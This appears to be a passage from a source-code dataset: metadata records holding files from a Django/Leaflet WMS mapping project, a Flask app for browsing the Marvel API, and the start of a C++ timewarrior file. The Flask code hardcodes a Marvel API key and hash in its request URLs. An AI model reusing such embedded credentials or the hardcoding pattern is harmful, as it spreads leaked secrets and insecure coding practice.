.openOn(this._map); \t\n\t }\n\t});\n },\n\n getFeatureInfoParams: function (latlng) {\n // Construct parameters object for a GetFeatureInfo request at a given point\n\tconst lat = latlng.lat;\n\tconst lon = latlng.lng;\n const params = {\n request: 'GetFeatureInfo',\n service: 'WMS',\n srs: 'EPSG:4326',\n version: '1.3.0', \n bbox: [lat, lon, lat + 0.00001, lon + 0.00001].join(','),\n height: 100,\n width: 100,\n i: 0,\n j: 0,\n layers: this.wmsParams.layers,\n query_layers: this.wmsParams.layers,\n info_format: 'text/xml',\n };\n \n if ('propertyName' in this.wmsParams)\n \tparams['propertyName'] = this.wmsParams.propertyName;\n return params; \n }\n});\n\nL.tileLayer.betterWms = function (url, options) {\n return new L.TileLayer.BetterWMS(url, options); \n};" }, { "alpha_fraction": 0.5234899520874023, "alphanum_fraction": 0.5755033493041992, "avg_line_length": 24.913043975830078, "blob_id": "7027c51f4ff8cab2aa486c05f671c0759fbb0c7a", "content_id": "5488f12c78875002a335b8f48045ca80230ffb5b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 596, "license_type": "no_license", "max_line_length": 92, "num_lines": 23, "path": "/maps/migrations/0016_auto_20191030_1446.py", "repo_name": "acaciawater/maps", "src_encoding": "UTF-8", "text": "# Generated by Django 2.2.5 on 2019-10-30 14:46\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('maps', '0015_auto_20190830_0831'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='group',\n name='layers',\n field=models.ManyToManyField(blank=True, to='maps.Layer'),\n ),\n migrations.AlterField(\n model_name='layer',\n name='groups',\n field=models.ManyToManyField(blank=True, to='maps.Group', verbose_name='group'),\n ),\n ]\n" }, { "alpha_fraction": 0.6207212805747986, "alphanum_fraction": 0.6216381192207336, "avg_line_length": 35.76404571533203, "blob_id": "aca19d0c59d1134aae1919966f18d255e9326107", "content_id": "98c699328976f778b9105c66e8925345b3a92ef9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3272, "license_type": "no_license", "max_line_length": 106, "num_lines": 89, "path": "/maps/admin.py", "repo_name": "acaciawater/maps", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom django.contrib.admin.decorators import register\nfrom .models import Map, Layer\nfrom django.contrib import messages\nfrom maps.models import Project, Timeseries, Group, Mirror\nfrom maps.actions import update_mirror\nfrom maps.forms import LayerPropertiesForm\nfrom django.shortcuts import render\nfrom django.utils.translation import gettext_lazy as _\n\n@register(Group)\nclass GroupAdmin(admin.ModelAdmin):\n model = Group\n fields = (('name','map'),('layers',))\n list_display = ('name', 'map', 'layer_count')\n list_filter = ('map',)\n filter_horizontal = ('layers',)\n \n\n@register(Layer)\nclass LayerAdmin(admin.ModelAdmin):\n model = Layer\n fields = (('layer','map'),('groups',),\n ('order','visible','use_extent'),\n ('opacity','transparent'),\n ('minzoom','maxzoom'),\n ('properties','clickable'),\n 'stylesheet',\n ('download_url','allow_download'),\n )\n list_filter = ('visible','map','groups','layer__server','allow_download')\n list_display = ('layer','map','group_names','extent','use_extent')\n search_fields = ('layer__title',)\n filter_horizontal = ('groups',)\n actions = ['update_layer_properties']\n \n def update_layer_properties(self, request, queryset):\n if 'apply' in request.POST:\n form = LayerPropertiesForm(request.POST)\n if form.is_valid():\n # filter null items from cleaned_data\n data = {k:v for k,v in form.cleaned_data.items() if v is not None}\n ret = queryset.update(**data)\n messages.success(request, _('Properties updated successfully for {} layers').format(ret))\n else:\n # warn about the problem\n messages.error(request, _('Properties were not updated: error in form'))\n elif 'cancel' in request.POST:\n messages.warning(request,_('Action to update layer properties was cancelled'))\n else:\n form = LayerPropertiesForm()\n return render(request, 'maps/layer_properties.html', \n context = {'form': form, 'meta': self.model._meta, 'queryset': queryset})\n\n update_layer_properties.short_description = _('Update layer properties') \n \nclass LayerInline(admin.TabularInline):\n model = Layer\n fields = ('layer', 'order', 'visible', 'clickable', 'allow_download', 'opacity')\n extra = 0\n \n def get_queryset(self, request):\n return admin.TabularInline.get_queryset(self, request).order_by('order').prefetch_related('layer')\n \n@register(Map)\nclass MapAdmin(admin.ModelAdmin):\n model = Map\n inlines = [LayerInline]\n actions = ['update_extent']\n \n def update_extent(self, request, queryset):\n count = 0\n for m in queryset:\n m.set_extent()\n count+=1\n messages.success(request, _('{} extents were updated sucessfully.').format(count))\n \n@register(Mirror)\nclass MirrorAdmin(MapAdmin):\n model = Mirror\n actions = [update_mirror]\n \n@register(Timeseries)\nclass TimeseriesAdmin(admin.ModelAdmin):\n model = Timeseries\n \n@register(Project)\nclass ProjectAdmin(admin.ModelAdmin):\n model = Project\n" }, { "alpha_fraction": 0.6902173757553101, "alphanum_fraction": 0.70652174949646, "avg_line_length": 31.41176414489746, "blob_id": "2ae130d1a66508e9b718ef52d6b1143a345dd0bf", "content_id": "603c5393cced7c74727077ca2d002f6946705779", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 552, "license_type": "no_license", "max_line_length": 76, "num_lines": 17, "path": "/maps/actions.py", "repo_name": "acaciawater/maps", "src_encoding": "UTF-8", "text": "'''\nCreated on Aug 28, 2019\n\n@author: theo\n'''\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.contrib import messages\n\ndef update_mirror(modeladmin, request, queryset):\n numLayers = 0\n numServers = 0\n for mirror in queryset:\n numLayers += mirror.update_layers()\n numServers += 1\n messages.success(request, _('{} servers processed.').format(numServers))\n messages.success(request, _('{} layers discovered.').format(numLayers))\nupdate_mirror.short_description=_('update layer list of selected mirrors')\n\n" }, { "alpha_fraction": 0.7765957713127136, "alphanum_fraction": 0.8085106611251831, "avg_line_length": 93, "blob_id": "a8dc3e9d095a318be1dcb61778fd93782fcbb090", "content_id": "1ce0ef4aa75b87308f59da7ae7f5e2596d87168f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 94, "license_type": "no_license", "max_line_length": 93, "num_lines": 1, "path": "/todo.txt", "repo_name": "acaciawater/maps", "src_encoding": "UTF-8", "text": "for info popups: https://astuntechnology.github.io/osgis-ol3-leaflet/leaflet/05-WMS-INFO.html\n" }, { "alpha_fraction": 0.5520833134651184, "alphanum_fraction": 0.7083333134651184, "avg_line_length": 18.200000762939453, "blob_id": "f2b87279a84b28be827a8ad16a5359b4c3ac0f64", "content_id": "882c48e30ce932fbcb6202e92eedfe2d205805ee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 96, "license_type": "no_license", "max_line_length": 26, "num_lines": 5, "path": "/requirements.txt", "repo_name": "acaciawater/maps", "src_encoding": "UTF-8", "text": "Django==2.2.5\nOWSLib==0.17.1\nPillow==6.0.0\ndjango-cors-headers==3.0.1\ndjango-debug-toolbar==2.0\n" }, { "alpha_fraction": 0.7504798173904419, "alphanum_fraction": 0.7658349275588989, "avg_line_length": 33.400001525878906, "blob_id": "1f80c40e7ce5e4e67b4c01d5b6be2957b06916e2", "content_id": "ab827b6ba994f31957a54df48e577989678c58af", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 521, "license_type": "no_license", "max_line_length": 80, "num_lines": 15, "path": "/maps/forms.py", "repo_name": "acaciawater/maps", "src_encoding": "UTF-8", "text": "'''\nCreated on Aug 29, 2019\n\n@author: theo\n'''\nfrom django.forms.forms import Form\nfrom django.forms import fields\n\nclass LayerPropertiesForm(Form):\n visible = fields.NullBooleanField(required=False)\n use_extent = fields.NullBooleanField(required=False)\n clickable = fields.NullBooleanField(required=False)\n transparent = fields.NullBooleanField(required=False)\n opacity = fields.DecimalField(max_digits=4, decimal_places=1,required=False)\n allow_download = fields.NullBooleanField(required=False)\n \n" }, { "alpha_fraction": 0.6076655983924866, "alphanum_fraction": 0.6146117448806763, "avg_line_length": 36.13364028930664, "blob_id": "15e852b97764674bfa84f9b348b1a4b973de9b42", "content_id": "f53960cc04be17d2c4ca639f249673cb8f6a4c36", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8062, "license_type": "no_license", "max_line_length": 174, "num_lines": 217, "path": "/maps/models.py", "repo_name": "acaciawater/maps", "src_encoding": "UTF-8", "text": "'''\nCreated on May 20, 2019\n\n@author: theo\n'''\nfrom django.db import models\nfrom django.utils.translation import gettext_lazy as _\nfrom wms.models import Layer as WMSLayer, Server\nfrom django.utils.text import slugify\nimport json\nfrom django.dispatch import receiver\nfrom django.db.models.signals import pre_save\nimport collections\nfrom django.urls.base import reverse\n\nclass MapsModel(models.Model):\n '''\n Abstract base model that adds 'app_label' and 'model_name' properties to model for use with admin:admin_urls template tag\n '''\n @property\n def app_label(self):\n return self._meta.app_label\n\n @property\n def model_name(self):\n return self._meta.model_name\n\n class Meta:\n abstract = True\n app_label = 'maps'\n \nclass Timeseries(MapsModel):\n name = models.CharField(_('name'),max_length=100,unique=True)\n server = models.URLField(_('server'))\n locations = models.CharField(_('locations'),max_length=100)\n popup = models.CharField(_('popup'),max_length=100)\n chart = models.CharField(_('chart'),max_length=100)\n\n def __str__(self):\n return self.name\n \n class Meta:\n verbose_name_plural = 'Timeseries'\n \nclass Map(MapsModel):\n \n name = models.CharField(_('name'),max_length=100,unique=True)\n bbox = models.CharField(_('extent'),max_length=100,null=True,blank=True)\n\n def layers(self):\n retval = collections.OrderedDict()\n for layer in self.layer_set.order_by('order'):\n retval[layer.layer.title]=layer.asjson()\n return json.dumps(retval)\n\n def groups(self):\n groups = {}\n\n ungrouped = self.layer_set.filter(groups__isnull=True).order_by('order').prefetch_related('groups')\n if ungrouped:\n groups['Layers'] = collections.OrderedDict()\n for layer in ungrouped:\n groups['Layers'][layer.layer.title]=layer.asjson()\n \n for group in self.group_set.order_by('name').prefetch_related('layers'):\n groups[group.name] = collections.OrderedDict()\n for layer in group.layers.order_by('order'):\n groups[group.name][layer.layer.title]=layer.asjson()\n\n return json.dumps(groups)\n \n \n def get_extent(self):\n map_extent = []\n for layer in self.layer_set.exclude(use_extent=False):\n bbox = layer.extent()\n if bbox:\n if map_extent:\n map_extent[0] = min(bbox[0], map_extent[0])\n map_extent[1] = min(bbox[1], map_extent[1])\n map_extent[2] = max(bbox[2], map_extent[2])\n map_extent[3] = max(bbox[3], map_extent[3])\n else:\n map_extent = list(bbox)\n return map_extent\n \n def set_extent(self):\n ext = self.get_extent()\n self.bbox = ','.join(map(str,ext))\n self.save(update_fields=('bbox',))\n return ext\n \n def extent(self):\n if not self.bbox:\n return self.set_extent()\n else:\n return list(map(float,self.bbox.split(',')))\n \n def __str__(self):\n return self.name\n\n def get_absolute_url(self):\n return reverse('map-detail', args=[self.pk]) \n\nclass Mirror(Map):\n\n server = models.ForeignKey(Server,on_delete=models.CASCADE)\n \n def update_layers(self):\n # update layer list on WMS server\n self.server.updateLayers()\n \n # update layer list of this map\n self.layer_set.all().delete()\n index = 0\n for layer in self.server.layer_set.all():\n self.layer_set.create(layer=layer,order=index,use_extent=False)\n index += 1\n return index\n\nclass Group(models.Model):\n name = models.CharField(_('group'), max_length=100)\n map = models.ForeignKey(Map,on_delete=models.CASCADE)\n layers = models.ManyToManyField('maps.Layer',blank=True)\n\n def layer_count(self):\n return self.layers.count()\n \n def __str__(self):\n return self.name\n\n class Meta:\n verbose_name = _('group')\n verbose_name_plural = _('groups')\n unique_together = ('name','map')\n \nclass Layer(MapsModel): \n map = models.ForeignKey(Map, models.CASCADE, verbose_name=_('map'))\n layer = models.ForeignKey(WMSLayer, models.CASCADE, verbose_name=_('WMS layer'),null=True)\n groups = models.ManyToManyField(Group, blank=True, verbose_name=_('group'), through='maps.group_layers')\n order = models.SmallIntegerField(_('order'))\n visible = models.BooleanField(_('visible'), default=True) \n visible.boolean = True\n format = models.CharField(_('format'), max_length=50,default='image/png')\n minzoom = models.SmallIntegerField(_('minzoom'),null=True, blank=True)\n maxzoom = models.SmallIntegerField(_('maxzoom'),null=True, blank=True)\n transparent = models.BooleanField(_('transparent'), default=True)\n transparent.Boolean = True\n opacity = models.DecimalField(_('opacity'), max_digits=4, decimal_places=1, default=1.0)\n\n use_extent = models.BooleanField(default=True,verbose_name=_('Use extent'))\n clickable = models.BooleanField(default=False,verbose_name=_('clickable'),help_text=_('show popup with info when layer is clicked'))\n clickable.boolean = True\n properties = models.CharField(_('properties'), max_length=200, null=True, blank=True, help_text=_('comma separated list of properties to display when layer is clicked')) \n\n allow_download = models.BooleanField(default=False,verbose_name=_('downloadable'), help_text=_('user can download this layer'))\n allow_download.Boolean=True\n download_url = models.URLField(_('download url'),null=True,blank=True,help_text=_('url for download of entire layer'))\n stylesheet = models.URLField(_('stylesheet'),null=True, blank=True, help_text=_('url of stylesheet for GetFeatureInfo response'))\n\n def group_names(self):\n return ','.join(map(str,self.groups.values_list('name',flat=True)))\n\n def extent(self):\n return self.layer.extent()\n \n def asjson(self):\n '''\n returns json dict for L.tileLayer.wms\n '''\n ret = {\n 'url': self.layer.server.url,\n 'layers': self.layer.layername,\n 'format': self.format,\n 'visible': self.visible,\n 'transparent': self.transparent,\n 'opacity': float(self.opacity),\n 'clickable': self.clickable,\n 'displayName': self.layer.title,\n }\n if self.properties:\n ret['propertyName'] = self.properties\n if self.allow_download and self.download_url:\n ret['downloadUrl'] = self.download_url\n if self.stylesheet:\n ret['stylesheet'] = self.stylesheet\n if self.minzoom:\n ret['minZoom'] = self.minzoom\n if self.maxzoom:\n ret['maxZoom'] = self.maxzoom\n try:\n ret['legend'] = self.layer.legend_url()\n except:\n pass #ret['legend'] = ''\n return ret\n\n def __str__(self):\n return '{}'.format(self.layer)\n\nclass Project(MapsModel):\n slug = models.SlugField(help_text=_('Short name for url'))\n name = models.CharField(_('name'),max_length=100,unique=True,help_text=_('Descriptive name of project'))\n title = models.CharField(_('tile'),max_length=100,help_text=_('Title on browser page'))\n logo = models.ImageField(_('logo'),upload_to='logos',null=True,blank=True)\n map = models.ForeignKey(Map,models.SET_NULL,null=True,blank=True,verbose_name=_('map'))\n timeseries = models.ForeignKey(Timeseries,models.SET_NULL,null=True,blank=True,verbose_name=_('timeseries'))\n \n def get_absolute_url(self):\n return reverse('project-detail', args=[self.pk]) \n\n def __str__(self):\n return self.name\n \n@receiver(pre_save, sender=Project)\ndef project_save(sender, instance, **kwargs):\n if instance.slug is None:\n instance.slug = slugify(instance.name)\n " }, { "alpha_fraction": 0.6343467831611633, "alphanum_fraction": 0.6433853507041931, "avg_line_length": 30.179487228393555, "blob_id": "c00fb23437d47e3bc56bf8906649b1939e478057", "content_id": "23d353f7049a6716a1e39a0345f41eb024e946ff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1217, "license_type": "no_license", "max_line_length": 141, "num_lines": 39, "path": "/maps/views.py", "repo_name": "acaciawater/maps", "src_encoding": "UTF-8", "text": "'''\nCreated on May 15, 2019\n\n@author: theo\n'''\nfrom django.views.generic.base import TemplateView\nfrom django.conf import settings\nfrom .models import Project, Map\nfrom django.views.generic.detail import DetailView\nimport json\n\nclass MapDetailView(DetailView):\n model = Map\n \n def getMap(self):\n return self.get_object() \n \n def get_context_data(self, **kwargs):\n context = TemplateView.get_context_data(self, **kwargs)\n context['api_key'] = settings.GOOGLE_MAPS_API_KEY\n context['options'] = {'zoom': 12, 'center': [52,5]}\n mapObject = self.getMap()\n context['map'] = mapObject\n context['extent'] = mapObject.extent()\n return context\n \nclass ProjectDetailView(MapDetailView):\n model = Project\n\n def getMap(self):\n return self.get_object().map\n \n def get_context_data(self, **kwargs):\n context = MapDetailView.get_context_data(self, **kwargs)\n project = self.get_object()\n if project.timeseries:\n series = project.timeseries\n context['series'] = json.dumps({'server': series.server, 'items': series.locations, 'popup': series.popup, 'chart':series.chart})\n return context\n\n" }, { "alpha_fraction": 0.6149425506591797, "alphanum_fraction": 0.6494252681732178, "avg_line_length": 14.818181991577148, "blob_id": "b1da110ecd6190a3ead1e6fd1e4ad2ab074d9108", "content_id": "210335e23e22e1bba352d81dd9f9742808faeb69", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 174, "license_type": "no_license", "max_line_length": 33, "num_lines": 11, "path": "/maps/apps.py", "repo_name": "acaciawater/maps", "src_encoding": "UTF-8", "text": "'''\nCreated on Jun 21, 2019\n\n@author: theo\n'''\nfrom django.apps import AppConfig\n\nclass MapsConfig(AppConfig):\n name = 'maps'\n label = 'maps'\n verbose_name = 'maps'\n" } ]
11
Ansh-Rathod/marvel-api
https://github.com/Ansh-Rathod/marvel-api
5efbae387ac7a7b922bdc9b587f63f005fb035b7
55cb6ca31747ffb98d9e09575b52e658d60fe889
0747ab68848520676670c5011a7b5acdf0018331
refs/heads/main
2023-02-20T05:25:35.133118
2021-01-24T10:01:59
2021-01-24T10:01:59
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6441717743873596, "alphanum_fraction": 0.6533742547035217, "avg_line_length": 23.789474487304688, "blob_id": "c9f298bec30f79686d33c078b04ba4d8584e720e", "content_id": "e3ef65a1c59f1a068e8821c7af337144e41f0735", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 978, "license_type": "no_license", "max_line_length": 82, "num_lines": 38, "path": "/marvel_api/static/js/main.js", "repo_name": "Ansh-Rathod/marvel-api", "src_encoding": "UTF-8", "text": "window.onscroll = function() {\r\n scroll()\r\n}\r\n\r\nfunction scroll() {\r\n var navbar = document.querySelector('.navbar')\r\n if (document.body.scrollTop > 20 || document.documentElement.scrollTop > 20) {\r\n navbar.classList.add('shado')\r\n } else {\r\n navbar.classList.remove('shado')\r\n }\r\n}\r\nwindow.addEventListener('load', function() {\r\n var preloder = document.querySelector(\".pre\")\r\n preloder.classList.add('finish')\r\n document.body.style.overflow = 'auto'\r\n\r\n})\r\nconst menu = document.querySelector(\".menu\")\r\nconst menu1 = document.querySelector(\".menu1\")\r\n\r\nconst nav = document.querySelector(\".nav\")\r\nlet isActive = true\r\n\r\nmenu.addEventListener(\"click\", function() {\r\n\r\n nav.classList.remove('finish')\r\n menu.classList.add('finish')\r\n menu1.classList.remove('finish')\r\n\r\n\r\n\r\n})\r\nmenu1.addEventListener(\"click\", function() {\r\n nav.classList.add('finish')\r\n menu.classList.remove('finish')\r\n menu1.classList.add('finish')\r\n})" }, { "alpha_fraction": 0.46165505051612854, "alphanum_fraction": 0.5392543077468872, "avg_line_length": 43.84722137451172, "blob_id": "bbfd6560b212c3fc951924a9a064b1c28cddb136", "content_id": "a18f15930fb32ea134852b3e28be676323e3bfa0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 3299, "license_type": "no_license", "max_line_length": 371, "num_lines": 72, "path": "/marvel_api/templates/comic.html", "repo_name": "Ansh-Rathod/marvel-api", "src_encoding": "UTF-8", "text": "{% extends 'inc/_layout.html' %} {% block body %}{% include 'inc/_navbar.html'%}\r\n<div class=\"jumbotron\">\r\n <h1>Search Comics</h1><br>\r\n <form action=\"/comicsearch\" method=\"POST\" class=\"form-group\">\r\n <input type=\"text\" name=\"Search\" placeholder=\"Search Marvel Comics...\" class=\"form-control\">\r\n <button type=\"submit\" class=\"btn btn-primary\">Search</button>\r\n </form><br>\r\n <hr><br>\r\n <h3>Search With Year</h3><br>\r\n <hr><br>\r\n <form action=\"/comicsearchyear\" method=\"POST\" class=\"form-group\">\r\n <input type=\"text\" name=\"Search\" placeholder=\"Search Marvel Comics...\" class=\"form-control\">\r\n <select name=\"Year\" placeholder=\"Search year...\" class=\"form-control\">\r\n <option value=\"2020\">2020</option>{% for year in range(1950,2020)%}\r\n <option value=\"{{year}}\">{{year}}</option>{% endfor%}</select>\r\n <button type=\"submit\" class=\"btn btn-primary\">Search</button>\r\n </form>\r\n\r\n</div>\r\n\r\n<div class=\"comics\">\r\n <h1 class=\"heading\">Comics</h1>\r\n <div class=\"comic_container-one\"> {% for comic in comics.data.results %}\r\n <div class=\"comic_container_inner\">\r\n <a href=\"/comics/{{comic.id}}\"><img src=\"{{comic.thumbnail.path}}.{{comic.thumbnail.extension}}\" alt=\"\" class=\"cover\"></a>\r\n <div class=\"description\">\r\n <h4 style=\"text-align:center;margin-bottom:12px\">{{comic.title}}</h4>\r\n <hr><br>\r\n <h4 style=\"float:left;border:1px solid #ddd;\">{{comic.prices[0].price}} <svg xmlns=\"http://www.w3.org/2000/svg\" width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><title>ic_attach_money_24px</title>\r\n <g fill=\"#e83030\">\r\n <path d=\"M11.8 10.9c-2.27-.59-3-1.2-3-2.15 0-1.09 1.01-1.85 2.7-1.85 1.78 0 2.44.85 2.5 2.1h2.21c-.07-1.72-1.12-3.3-3.21-3.81V3h-3v2.16c-1.94.42-3.5 1.68-3.5 3.61 0 2.31 1.91 3.46 4.7 4.13 2.5.6 3 1.48 3 2.41 0 .69-.49 1.79-2.7 1.79-2.06 0-2.87-.92-2.98-2.1h-2.2c.12 2.19 1.76 3.42 3.68 3.83V21h3v-2.15c1.95-.37 3.5-1.5 3.5-3.55 0-2.84-2.43-3.81-4.7-4.4z\"></path>\r\n </g>\r\n</svg></h4><br><br>\r\n <center><a href=\"{{comic.urls[0].url}}\" class=\"btn\" style=\"padding:8px 30px ;\">Buy Now</a></center>\r\n </center><br>\r\n </div>\r\n </div>{% endfor %}</div><br></div>\r\n<div class=\"center\">\r\n <div class=\"pagination\" style=\"margin-top:50px\">\r\n {%if prev == -1 %}{% else %}\r\n <a href=\"/comics/page/{{prev}}\" class=\"active\">Previous page</a>{% endif %} {% if number == 15 %}{% else %}\r\n <a href=\"/comics/page/{{number}}\" class=\"active\">Next page</a>{% endif %}\r\n </div>\r\n</div>\r\n<div class=\"footer\">\r\n <ul>\r\n <a href=\"#\">\r\n <li>Blog</li>\r\n </a>\r\n <a href=\"#\">\r\n <li>RSS</li>\r\n </a>\r\n <a href=\"#\">\r\n <li>instagram</li>\r\n </a>\r\n <a href=\"https://github.com/Appii00\">\r\n <li>GitHub</li>\r\n </a>\r\n <a href=\"https://developer.marvel.com/docs#!/public/getCreatorCollection_get_12\">\r\n <li>API</li>\r\n </a>\r\n\r\n </ul>\r\n <br>\r\n <hr>\r\n <br>\r\n <a>Made by Ansh Rathod.</a><br>\r\n <a>Code created in Python flask app</a><br>\r\n <a>Based on coustum css. Icons from Font Awesome. Web fonts from Google.</a>\r\n <br><br>\r\n</div>\r\n{%endblock%}" }, { "alpha_fraction": 0.5833333134651184, "alphanum_fraction": 0.6678779125213623, "avg_line_length": 36.57944107055664, "blob_id": "e28d73e11c25567c83c6505989d354d378eaf70d", "content_id": "16287afd60a2f67c9556df4599db5b545db9f0c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4128, "license_type": "no_license", "max_line_length": 193, "num_lines": 107, "path": "/marvel_api/app.py", "repo_name": "Ansh-Rathod/marvel-api", "src_encoding": "UTF-8", "text": "from flask import *\r\nimport requests\r\nimport os\r\n\r\napp = Flask(__name__, template_folder='./templates')\r\n\r\n\r\[email protected]_processor\r\ndef override_url_for():\r\n return dict(url_for=dated_url_for)\r\n\r\n\r\ndef dated_url_for(endpoint, **values):\r\n if endpoint == 'static':\r\n filename = values.get('filename', None)\r\n if filename:\r\n file_path = os.path.join(app.root_path, endpoint, filename)\r\n values['q'] = int(os.stat(file_path).st_mtime)\r\n return url_for(endpoint, **values)\r\n\r\n\r\[email protected]('/')\r\ndef index():\r\n return render_template('index.html')\r\n\r\n\r\[email protected]('/search', methods=['POST', 'GET'])\r\ndef search():\r\n r = requests.get(\r\n 'https://gateway.marvel.com/v1/public/characters?ts=1&apikey=690e3ac16286c2de4591eca37269eedb&hash=fcbd875beb64e407e41ea8088ed2cd0c')\r\n if request.method == 'POST':\r\n if request.form['Search'] == '':\r\n print('please enter')\r\n else:\r\n Search = request.form['Search']\r\n r = requests.get(\r\n 'https://gateway.marvel.com/v1/public/characters?ts=1&apikey=690e3ac16286c2de4591eca37269eedb&hash=fcbd875beb64e407e41ea8088ed2cd0c&nameStartsWith='+Search)\r\n return render_template('search.html', result=json.loads(r.text))\r\n\r\n return render_template('search.html', result=json.loads(r.text))\r\n\r\n\r\[email protected]('/char/<string>')\r\ndef char(string):\r\n r = requests.get('https://gateway.marvel.com/v1/public/characters/'+string +\r\n '?ts=1&apikey=690e3ac16286c2de4591eca37269eedb&hash=fcbd875beb64e407e41ea8088ed2cd0c')\r\n comic = requests.get('https://gateway.marvel.com/v1/public/characters/'+string +\r\n '/comics?ts=1&apikey=690e3ac16286c2de4591eca37269eedb&hash=fcbd875beb64e407e41ea8088ed2cd0c')\r\n\r\n return render_template('char.html', result=json.loads(r.text), comics=json.loads(comic.text))\r\n\r\n\r\[email protected]('/char/page/<string>')\r\ndef page(string):\r\n\r\n r = requests.get('https://gateway.marvel.com/v1/public/characters?ts=1&apikey=690e3ac16286c2de4591eca37269eedb&hash=fcbd875beb64e407e41ea8088ed2cd0c&limit=100&offset='+str(int(string)*100))\r\n read = json.loads(r.text)\r\n\r\n next = int(string)+1\r\n prev = int(string)-1\r\n\r\n return render_template('page.html', result=read, number=next, prev=prev)\r\n\r\n\r\[email protected]('/comics/page/<string>')\r\ndef comics_page(string):\r\n r = requests.get('https://gateway.marvel.com/v1/public/comics?ts=1&apikey=690e3ac16286c2de4591eca37269eedb&hash=fcbd875beb64e407e41ea8088ed2cd0c&limit=100&offset='+str(int(string)*100))\r\n read = json.loads(r.text)\r\n\r\n next = int(string)+1\r\n prev = int(string)-1\r\n return render_template('comic.html', comics=read, number=next, prev=prev)\r\n\r\n\r\[email protected]('/comics/<string>')\r\ndef comics_id(string):\r\n r = requests.get('https://gateway.marvel.com/v1/public/comics/'+string +\r\n '?ts=1&apikey=690e3ac16286c2de4591eca37269eedb&hash=fcbd875beb64e407e41ea8088ed2cd0c')\r\n return render_template('comicinfo.html', result=json.loads(r.text))\r\n\r\n\r\[email protected]('/comicsearch', methods=['GET', 'POST'])\r\ndef comicsearch():\r\n if request.method == 'POST':\r\n Search = request.form['Search']\r\n\r\n r = requests.get(\r\n 'https://gateway.marvel.com/v1/public/comics?ts=1&apikey=690e3ac16286c2de4591eca37269eedb&hash=fcbd875beb64e407e41ea8088ed2cd0c&titleStartsWith='+Search)\r\n return render_template('comicsearch.html', comics=json.loads(r.text))\r\n\r\n return render_template('comicsearch.html')\r\n\r\n\r\[email protected]('/comicsearchyear', methods=['GET', 'POST'])\r\ndef comicsearchyear():\r\n if request.method == 'POST':\r\n Search = request.form['Search']\r\n year = request.form['Year']\r\n r = requests.get(\r\n 'https://gateway.marvel.com/v1/public/comics?ts=1&apikey=690e3ac16286c2de4591eca37269eedb&hash=fcbd875beb64e407e41ea8088ed2cd0c&titleStartsWith='+Search+'&startYear='+year)\r\n return render_template('comicsearch.html', comics=json.loads(r.text))\r\n return render_template('comicsearch.html')\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n app.run()\r\n" }, { "alpha_fraction": 0.7627118825912476, "alphanum_fraction": 0.7627118825912476, "avg_line_length": 28.5, "blob_id": "68eee55b00e1b1313e39e44e10ec97dcf672d63d", "content_id": "65f71f1d3fc4b1dd689b78376b458df1d3919822", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 59, "license_type": "no_license", "max_line_length": 49, "num_lines": 2, "path": "/README.md", "repo_name": "Ansh-Rathod/marvel-api", "src_encoding": "UTF-8", "text": "# marvel\nhttps://appi-rathod.herokuapp.com/ check out this\n" } ]
4
JacobJohansen/timewarrior
https://github.com/JacobJohansen/timewarrior
0f3e03aa1fb708184924b5fe7b670c1e8162886e
fc618636aacba6e52d447b482aeef58b375dfc8c
253d35f978b774c981f45d2d74fba5127db57e34
refs/heads/master
2023-08-27T01:16:48.426553
2021-05-27T19:16:13
2021-05-28T11:04:33
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6000694632530212, "alphanum_fraction": 0.6038916110992432, "avg_line_length": 29.294736862182617, "blob_id": "1c3b50a3abb9c26b78d1c9d3ab41d81930ebee16", "content_id": "3f592a23c62b1948871c3a4f6dd3f93569ddfb3c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2878, "license_type": "permissive", "max_line_length": 80, "num_lines": 95, "path": "/src/commands/CmdSplit.cpp", "repo_name": "JacobJohansen/timewarrior", "src_encoding": "UTF-8", "text": "////////////////////////////////////////////////////////////////////////////////\n//\n// Copyright 2016 - 2021, Thomas Lauf, Paul Beckingham, Federico Hernandez.\n//\n// Permission is hereby granted, free of charge, to any person obtaining a copy\n// of this software and associated documentation files (the \"Software\"), to deal\n// in the Software without restriction, including without limitation the rights\n// to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n// copies of the Software, and to permit persons to whom the Software is\n// furnished to do so, subject to the following conditions:\n//\n// The above copyright notice and this permission notice shall be included\n// in all copies or substantial portions of the Software.\n//\n// THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS\n// OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n// FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n// THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n// LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n// OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n// SOFTWARE.\n//\n// https://www.opensource.org/licenses/mit-license.php\n//\n////////////////////////////////////////////////////////////////////////////////\n\n#include 